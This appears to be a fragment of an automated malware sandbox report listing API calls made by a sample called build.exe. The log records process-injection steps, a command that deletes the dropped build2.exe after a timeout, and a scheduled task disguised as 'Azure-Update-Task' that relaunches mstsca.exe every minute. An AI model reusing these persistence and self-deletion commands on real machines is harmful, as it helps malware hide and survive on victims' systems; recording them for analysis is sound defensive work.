NtAllocateVirtualMemory March 12, 2023, 11:03 a.m.	process_identifier: 2668 region_size: 462848 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory March 12, 2023, 11:03 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2668 process_handle: 0x00000080	1	1
NtSetContextThread March 12, 2023, 11:03 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4390060 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2668	1	0
NtResumeThread March 12, 2023, 11:03 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2668	1	0
CreateProcessInternalW March 12, 2023, 11:04 a.m.	thread_identifier: 2344 thread_handle: 0x00000608 process_identifier: 2340 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\test22\AppData\Local\da7eb17b-ad07-4b46-8386-a2dc6d315c48\build2.exe" & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000604	1	1
NtResumeThread March 12, 2023, 11:04 a.m.	thread_handle: 0x00000608 suspend_count: 1 process_identifier: 2340	1	0
CreateProcessInternalW March 12, 2023, 11:03 a.m.	thread_identifier: 2932 thread_handle: 0x000000ac process_identifier: 2928 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1
CreateProcessInternalW March 12, 2023, 11:04 a.m.	thread_identifier: 2408 thread_handle: 0x00000084 process_identifier: 2404 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\timeout.exe track: 1 command_line: timeout /t 6 filepath_r: C:\Windows\system32\timeout.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1

build.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All